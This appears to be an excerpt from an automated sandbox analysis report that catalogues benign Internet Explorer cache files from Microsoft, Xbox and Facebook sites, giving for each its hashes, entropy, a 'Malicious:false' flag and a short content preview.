                                                                                                                                                                                                              Preview: require(["tooltip","componentFactory"],function(n,t){t.ComponentFactory&&t.ComponentFactory.create&&t.ComponentFactory.create([{component:n.Tooltip}])});define("observableComponent",["require","exports","htmlExtensions"],function(n,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function n(t,i){i===void 0&&(i=null);this.element=t;this.ignoreNextDOMChange=!1;this.observing=!1;n.shouldInitializeAsClass(t,i)&&this.setObserver()}return n.prototype.detach=function(){this.unObserve();this.teardown()},n.prototype.isObserving=function(){return this.observing},n.prototype.unObserve=function(){this.observing=!1;this.modernObserver&&this.modernObserver.disconnect();i.removeEvent(this.element,i.eventTypes.DOMNodeInserted,this.obsoleteNodeInsertedEventHander);i.removeEvent(this.element,i.eventTypes.DOMNodeRemoved,this.obsoleteNodeRemovedEventHandler)},n.prototype.setObserver=function(){this.observing=!0;typeof n.mutationObserver!="undefined"?this.observeModern():
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\twitter-gray[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1050
                                                                                                                                                                                                              Entropy (8bit):5.144119545658824
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:2dMAjLf3G5LtxjYzD0tOLQj4HszWP3mzFL+Zqrak:cMA/f36LHYc14yWP3mzxdrak
                                                                                                                                                                                                              MD5:6C34FDD7FED32E9B5CF6B17105FCEC21
                                                                                                                                                                                                              SHA1:4E3035BBEBA2A5F88DBB9CD2EA24D473EA52FFBF
                                                                                                                                                                                                              SHA-256:5001D94A9D189B326EC8C117B2915CEAD90786291333B6CFBC5AE3A40415256D
                                                                                                                                                                                                              SHA-512:11A30C1D59FB5F690521FACAD803C12108036C686DDA8071D6E49751890A874C3D257A7F0019F1EFA62FB108772CFCB87AE70EAB7840DAFFE52F7FFFF6FC23F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/twitter-gray.svg?version=9b4af76e-357b-33af-9bf5-7b5dbf882330
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 150 150" style="enable-background:new 0 0 150 150;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#232020;}.</style>.<rect class="st0" width="150" height="150"/>.<path class="st1" d="M141.4,35.8c-4.9,2.2-10.2,3.6-15.7,4.3c5.6-3.4,9.9-8.7,12-15c-5.3,3.1-11.1,5.4-17.3,6.6..c-5-5.3-12.1-8.6-19.9-8.6c-15.1,0-27.2,12.2-27.2,27.2c0,2.2,0.2,4.2,0.6,6.2c-22.6-1.2-42.6-12-56-28.5c-2.3,4.1-3.7,8.7-3.7,13.8..c0,9.4,4.9,17.8,12.1,22.6C21.9,64.3,17.6,63,14,61c0,0.1,0,0.2,0,0.3c0,13.2,9.4,24.2,21.8,26.7c-2.2,0.6-4.6,0.9-7.1,0.9..c-1.7,0-3.5-0.1-5.2-0.5c3.5,10.8,13.5,18.7,25.4,19c-9.3,7.2-21,11.6-33.7,11.6c-2.2,0-4.4-0.1-6.5-0.4..c12.1,7.8,26.3,12.2,41.8,12.2c50.1,0,77.5-41.5,77.5-77.5c0-1.2,0-2.4-0.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xbox-MWF[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9484
                                                                                                                                                                                                              Entropy (8bit):4.51242666143582
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:kDZgm6y1yc9f3jFBLGk+9yBeGkP9RAWCRn1c98Rm1D9qh3JJWlrRzqE0qEXqEug7:6ZgiyEzebWejfrsazqE0qEXqEX7BzqEL
                                                                                                                                                                                                              MD5:81A24DC0754B6A04EAFBA79727AE4FC5
                                                                                                                                                                                                              SHA1:4471053748D715166CD5B81AC4F1C001A3FC3621
                                                                                                                                                                                                              SHA-256:B00E393CCF13D1D09FBE882BF7792F708165ABF511FE2B7B7827452CB09943BE
                                                                                                                                                                                                              SHA-512:1488513FFB010A54674A80685B5E20A38DD6D40E0BAB5F40BA786C296D14511410E01471934463854721FC84255ED74E6B9FC6E9769338115CBE16163A10F267
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/templates/MWF/JS/xbox-MWF.js?_=1620858088979
                                                                                                                                                                                                              Preview: $(document).ready(function() {.. /*Code for ambient video play/pause button*/.. $(".m-ambient-video.pp-button").each(function(index) {. var videoStateClass = "";. var aria_label = "";. var toggled_label = "";. var video = $(this).find("video")[0];. if (!video.controls) {. video.addEventListener("ended", function() {. var curButton = $(this).parent().parent().find(".vidPlayPause")[0];. aria_label = "play";. $(curButton).removeClass("glyph-pause").addClass("glyph-play");. $(curButton).attr("aria-label", aria_label);. });. if (isPlaying(video) || video.autoplay) {. videoStateClass = "glyph-pause";. aria_label = "Pause";. toggled_label = "play";. } else {. videoStateClass = "glyph-play";. aria_label = "Play";. toggled_label = "pause";. }.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\youtube[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):332
                                                                                                                                                                                                              Entropy (8bit):6.98162511423406
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhP1RnDspLyshlqTlgvEfC3u58MjCN88S2pFpWtPOgGctgT2n6SsMAPvZUVp:6v/79GlyAlqiEfC3kjSfFEPOot8A6lPs
                                                                                                                                                                                                              MD5:B9A1E843699FA17513F807BC78F774FB
                                                                                                                                                                                                              SHA1:599E12FCB9C0843C72832DB6CD2A441797C79568
                                                                                                                                                                                                              SHA-256:A7A52942C5CCB21D55B9FDBB5BA8261544C8AA5E2AA0D71B4E20126728E29EF1
                                                                                                                                                                                                              SHA-512:5D2BF0941EFD83725ACF76374FB6763FE08EDF924D11D8903A6077EC930E52747962A676FE766ACD07523765434E67751A0B2DBFDE1B05D545D79E064A1F8649
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/c79952ca/coreui.statics/images/social/youtube.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b|...@K..@c0j......L!..?..hf.u...{..%K.n.&.\.&......*/e..!9(DD....?...."..)..L...0IIQ....I.....6.}p..ZSG.5.%S`".Z.}...?.0..-.XC.....jjBfF#."i)`^a..#''.5S.h,..{./....F.dJ|. ..%......, ).cM..,....C..n.D.5@..5...'..v....0.....S.+T......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\017d64b0-0fac-4011-8117-09c5f198e9e4[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1083x1222, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):138909
                                                                                                                                                                                                              Entropy (8bit):7.910749660807374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:pKCUYKDSftT5cLXw8N/Em4khky/6RXoX8cRxzaWbXVQkoKVyR:pKCPjHE1EdukyikjoWl2
                                                                                                                                                                                                              MD5:4D3F880D4F1C8B9151EDE1DAB062FB18
                                                                                                                                                                                                              SHA1:C737F6D17E45A753A9C9AF12F7A915382B458811
                                                                                                                                                                                                              SHA-256:22672BEAE081B5066D16F7943DEED6E3276095B9AF839389B1742EF7A85C0D32
                                                                                                                                                                                                              SHA-512:3E30781BECA100E56B7E015493AD83AC715D9469C797802201218500E7C844B2E8AFBFA8BEC7EE9B5C7911D20752A8607682677CD587B4F1930F76D4E2AABBA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/01/7d/017d64b0-0fac-4011-8117-09c5f198e9e4.jpg?n=Destiny-2_Large-tout-0_Season-14_1083x1222.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d.............;.....................................................................................b........!..1A.Qa."q..2...B...#3Rb...r..c............$%&'()*456789:CDEFGHIJSTUVWXYZdefghijstuvwxyz..........................................................................................!.1.A."Qq..........a...#$%&'()*23456789:BCDEFGHIJRSTUVWXYZbcdefghijrstuvwxyz.............................................................................................?..3?.B]..>......j.a..}............>.i:....S.....>..y.nO4...q..k.....@.s?.....}.-|D.....G.g.......1...wj.vL.......3.9.H.....j......>.....q.........:.z..u...(2....j......s..>...y.c.H8.....0P/...@}..1.....^P.%.z..';...PNg....7s...>.....-..........q.....>..PC8>!..."....C?e..G9..7.-...q...@."aG.{.V..3.+l....x..s+..>..w..iS....<7....g. WiS....g...j.M5...<P.oi>....%...j
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\049c05aa-b666-45db-8a1b-5782c844018c[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):952
                                                                                                                                                                                                              Entropy (8bit):5.086458136534339
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:2dVNATLf3aR2ZPtxIsV+K/3xx40UMnTJc+7Dlriv5:cvAvf3a83IsVvVUCTS+hih
                                                                                                                                                                                                              MD5:E34A70DCBF3CC085D1FCEF750E722559
                                                                                                                                                                                                              SHA1:FAC9532512572CDC9E0852D5FDEC262134C9E2A2
                                                                                                                                                                                                              SHA-256:640E73DD974C69CFFA7A20BBA71E1F0806935200BEA86E791BF7B2218C2E5C04
                                                                                                                                                                                                              SHA-512:3597751E9914880697F2B12D2E14EB4C3EE9A9967DAF8154320EC733B870615FB111EDABE9B568249FF2D7BE44F83436E6D6863C916EC978E1849CD5075816BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/04/9c/049c05aa-b666-45db-8a1b-5782c844018c.svg?n=Xbox-Follow-Footer_Image-0_Twitter_32x32.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">.<rect fill="#FFFFFF" width="32" height="32"/>.<g id="Twitter">..<path fill="#171717" d="M21,5.7c-0.5,0.8-1.3,1.5-2.1,2.1c0,0.2,0,0.4,0,0.5c0,2.9-1.1,5.7-3,7.9c-2.2,2.5-5.4,3.9-8.6,3.8...C5,20,2.8,19.4,1,18.2c0.4,0,0.6,0,1,0c1.8,0,3.6-0.6,5.1-1.8c-0.9,0-1.7-0.3-2.4-0.8c-0.7-0.5-1.2-1.2-1.5-2c0.2,0,0.5,0,0.7,0.1...c0.4,0,0.7,0,1.1-0.1c-1.9-0.5-3.2-2.2-3.2-4.1V9.4C2.5,9.7,3.1,9.9,3.7,10C2.5,9.3,1.9,8,1.9,6.5c0-0.7,0.2-1.5,0.5-2.1...c2,2.6,5.1,4.2,8.5,4.3c-0.1-0.3-0.1-0.6-0.1-0.9c0-2.3,1.8-4.1,4.1-4.1l0,0c1.2,0,2.3,0.5,3,1.3c0.9-0.2,1.8-0.5,2.6-1...c-0.3,1-0.9,1.8-1.8,2.3C19.5,6.3,20.3,6,21,5.7z"/>.</g>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0dadb15c-e2d0-4c7b-bf28-0fa82b643722[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):617
                                                                                                                                                                                                              Entropy (8bit):5.385195172539894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdP9Ni/nzVJ/KYf3nWVNyyzR2Z8YXODL4e/R6QJwjii:2dVNATLf3aR2Z8qeLJwOi
                                                                                                                                                                                                              MD5:85E21DC0067C1B321F22ED45666CC7E4
                                                                                                                                                                                                              SHA1:6141B43761ACD3E271082BF46DB2185120918429
                                                                                                                                                                                                              SHA-256:5C41C24B652574AB353FB4ECE2083BCA4579A6BD50625BA2610E6EE4D97A0480
                                                                                                                                                                                                              SHA-512:28110FE82EF7A62D3459B519EFDF7CCCA8C46BC5D84A087E4A7CCFE9DD87DAF543F1642C81F3D402239F503606FFAAD7D16CB042589E1BE629F7EFA09AA5000B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/0d/ad/0dadb15c-e2d0-4c7b-bf28-0fa82b643722.svg?n=Xbox-Follow-Footer_Image-0_Facebook_32x32.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">.<rect fill="#FFFFFF" width="32" height="32"/>.<g id="Facebook">..<path fill="#171717" d="M11.9,22.6H7.4v-10h-2v-3h2V7.1c0-1.2,0.4-2.4,1.2-3.3c1-0.9,2.3-1.3,3.7-1.2h3.1v3h-2.1...c-0.5,0-0.9,0.2-1.2,0.6c-0.2,0.4-0.2,0.9-0.2,1.4v2H15l-0.4,3h-2.8L11.9,22.6L11.9,22.6z"/>.</g>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1539ae37-38eb-40df-b956-21a0eda8c9b9[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):555
                                                                                                                                                                                                              Entropy (8bit):5.467528555695981
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdP9Ni/nzVJ/KYf3nWVNyyzR2ZULYsA7RK3GJO02VXu:2dVNATLf3aR2ZULVA7KGJO0B
                                                                                                                                                                                                              MD5:492C641DE8A3939D45F81937FEB1154D
                                                                                                                                                                                                              SHA1:B9BF73CE048A979B77698B72044802CCEF012EC8
                                                                                                                                                                                                              SHA-256:B4D1FADA7B2436AF1AABACB0BC60160D5D0FAAF65AC67B753C071BD322B3EA3F
                                                                                                                                                                                                              SHA-512:C153ADAB6165024D77C275ABA9DD5545C351EB35FAF34EABA759A0524A4CFCBF38C5B2FFEDB485720506755F495C36E0A17B57C0271FDB75D7B7904E840C1E9B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/15/39/1539ae37-38eb-40df-b956-21a0eda8c9b9.svg?n=Xbox-Follow-Footer_Image-0_Mail_32x32.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">.<rect fill="#FFFFFF" width="32" height="32"/>.<g>..<path fill="#171717" d="M0,4.4h21v16.8H0V4.4z M18.9,6.5H2.1v2l8.4,4.2l8.4-4.2V6.5z M2.1,19.1h16.8v-8.3L10.5,15l-8.4-4.2...C2.1,10.8,2.1,19.1,2.1,19.1z"/>.</g>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\17-f90ef1[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):135290
                                                                                                                                                                                                              Entropy (8bit):5.2254562447372
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:1f/HuFzpxJIS20i9d1EwgXA95KSqDCE4t:1f/HuXIZRjt
                                                                                                                                                                                                              MD5:07CB1B6723F61F949C862B399E06B3BF
                                                                                                                                                                                                              SHA1:83ABC38AB7E787F719E859E3EA97D4A634FE61FC
                                                                                                                                                                                                              SHA-256:82A7ACB7D942575069E4067375BEC0C33F1949EA2864BE8BD12E9D6DB74A345D
                                                                                                                                                                                                              SHA-512:D520D31E12A3D2D316347D96E4E3D20D7E5C988A4824228097D1DF0A5AB3F12334096C2ADD5D0A7345EF8A2E674712F84D9F8CFC2E973A2A4DEDA546337C94CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/bb-d7480b/db-bc0148/dc-7e9864/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/17-f90ef1?ver=2.0&_cf=20210415&iife=1
                                                                                                                                                                                                              Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1770559986549030[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):261303
                                                                                                                                                                                                              Entropy (8bit):5.474016711655495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:Rk1HgCSntDV/HaK3V/Ha8NEPjQHguH3HpQrwzzm5D:dNESG
                                                                                                                                                                                                              MD5:44FBBB1B2E1D7F57832110A5111E237A
                                                                                                                                                                                                              SHA1:C7380E9505F1D95ED227F0E51AB054FDE57427A8
                                                                                                                                                                                                              SHA-256:EE8760875264946611B114703CD989E954DEB75899D0F21FBEBABEDB0CB170AE
                                                                                                                                                                                                              SHA-512:9D0765AEAA2977D22CF537904A7F96FEFBBE85C2E3681DCD50C9B528CDD227D58F07A8A994238B1355C0F7CBBFE6B0E487910A68FAD60CE2B2D5C665F7EF5F81
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://connect.facebook.net/signals/config/1770559986549030?v=2.9.39&r=stable
                                                                                                                                                                                                              Preview: /**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel09_4Up_HearingTool[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):29813
                                                                                                                                                                                                              Entropy (8bit):7.98015026340844
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:hpYp+TQWt1kB0/vQ9hcU3SvrfbuMCdHKQB5z75noAn1qa:DYp+MWiWySvHe975n31/
                                                                                                                                                                                                              MD5:46BC776ACF2EFB6A721AEC68798C8780
                                                                                                                                                                                                              SHA1:2FF7F13336540435D5A06DA8F91D4FE3914FDD87
                                                                                                                                                                                                              SHA-256:943CD3F7A7801A61C6D855DDE3C78CC4447DD3F556BC5120418ADD6AB0C749B9
                                                                                                                                                                                                              SHA-512:586E196C30749450962A522867A514F46636C9D6A912540D98ABB85DA3BC2FEF99A198FE328A72850BE72196BCA7E39E4DB1A53873EF26CBDC5449B27F97406E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel09_4Up_HearingTool.jpg?version=a25700ba-e0b6-2a8c-da8a-68dfbde01dd4
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f....................................................r.H8.W.c....ih.....H..e/....i.q....!-.[6.W.s.,.......5...S.1U.0i6...v...0.>.j...6v.J=K.i.E.]..v...-.........^6w.:.xJh..?....C..I..>..-..s.yX=.'.}..V|..99Tc...a^.fU...QS.\.v.~.Nb.._.C+VU....:Q.t2`......9.+\Jf.N}@..7.....W..WL.)cw... ?A..E....X.kXs..$$...<.Nyf^@f....;.3o.b.s.>W.._}.Y.b.....'.a0qf.i'..$....d.!.4......}..x...X_D.K..Z.g<..j.%.Uc}.5#.(...c.|..\t.hQ0..wZE+>....>[..m.F.k.1~O......H,.^H....c.u..2....>.]..w.T.C...~.m.{.t..Wb.&...........R...@a.R.Z.I..}.(.C.......=Js......K...W..$gn.+...m...O.R......... .o.}.U..H......,.."..E.).';u.O.P.].C.k....>..}...PJ...]....0j.....:(.N.....%..8KD.^.l..+.GW.9.Iz...R.v....z.JwH%....c..l.;{mU..!.-......M....O..z...].1u.v...v.w...Tc&.4K.%.....ZY..q..u.A.+..0..a&A...W$V.7..0.5.}Y.}%[.,..e.r.L....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel09_4Up_LearningDisability[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):21164
                                                                                                                                                                                                              Entropy (8bit):7.972291454252598
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fDAuYgj+VnKDcAjAP+7Kgmqb13F5spsROMnnn4owRDaIIyRxUpdIl0Y:ZIM1j6+zmwCpG1nn4PbxUL6
                                                                                                                                                                                                              MD5:40875D9CB2AEF302316728F02FA3B141
                                                                                                                                                                                                              SHA1:488C186A0DB2A9C96BC4D3169DC3E56AE5DF2E9E
                                                                                                                                                                                                              SHA-256:104E4A2A7445295C2DB1EFAEB50CC95D3F17D06D95437160C4D4832804B3698F
                                                                                                                                                                                                              SHA-512:30E130A984AF8D23EF255CAE6B0BDBAE3C846594C4EEBE300A6B0C091A34875DBE16EAC4BA59D48B803038CE61310ADC21286781BC0B09A03C080B7B94BD7634
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel09_4Up_LearningDisability.jpg?version=9cb903d6-7593-4adb-62e7-7d3d2b1d68f8
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................f...................................................../...$...}.9.}.e.[..L?..Z.B.%...W1o.O....F!.AB1....}...x.w~T.h......}..K...w.....!....y9.a_:..|.nu?`g.th.O.$..U.e...1. .@!.).=..\....$..k.M.... .<4}Av".!.c.. ."...U.....h..Wr.k.....K=\....C..1.#.... .....i.......5l..u...8[1'.e....%... ...D....)F-&.j.o.#....c.lI..+.3....(@.1...B!....2-Z..'..\.D...yL.uN..ivV...(@..!.B....n..U.>id.y..:.f.7)`.?N]...JP4%... .BL...ZR.m.y..a$m..T.aN{.M....JP.!..B0."E3V...N.G.xY.Q.`Y.....S........%.@...!F.5B9J.r...X...U..n..T...c..R..(@...B..!.9:..8srq..!i...?..F.q.'.J.. c..1.g..^....`.+n...ou...}.c..R...@.1..?.H5.D../.1%9-..?M\M.'.....-5..q.cJv..o....OW1-...)Q........=......i....k......m.os............_n...{..au_A..._0.t ".}X...jk..PU\z:....Y-...so...././...3jg...._.;|.".K.c.Mh.GXc..O..9......O..-}..I$.e.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1920_Panel11_4Up_Bring[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):33762
                                                                                                                                                                                                              Entropy (8bit):7.967880107239827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8B4K+Tq+wNjAJZ2gbKqc/wsLrW7s6NyrqiRa789HK:G4K+TE6JZsMsXWqqiRa78lK
                                                                                                                                                                                                              MD5:2B26950F495614F8F0093C7D5CF546C9
                                                                                                                                                                                                              SHA1:1A32765F9EE01F623FB8097F9835EF60244A89D7
                                                                                                                                                                                                              SHA-256:24F6754F1131FAFB99E6BE1B2BE7F2C9A6C1B1C3063277E77572D7FD24CA1609
                                                                                                                                                                                                              SHA-512:6AB4C789C12EDB654759028B95F0DF9CB444F7C4DD6E1EAC48DB4F9BA202A20DAF0D45FA0F8BD6B40CC7291358603B8863FE177051133B7166CF79CCB81F8750
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1920_Panel11_4Up_Bring.jpg?version=6dad2d9d-7e5b-403a-290e-4c009f855a65
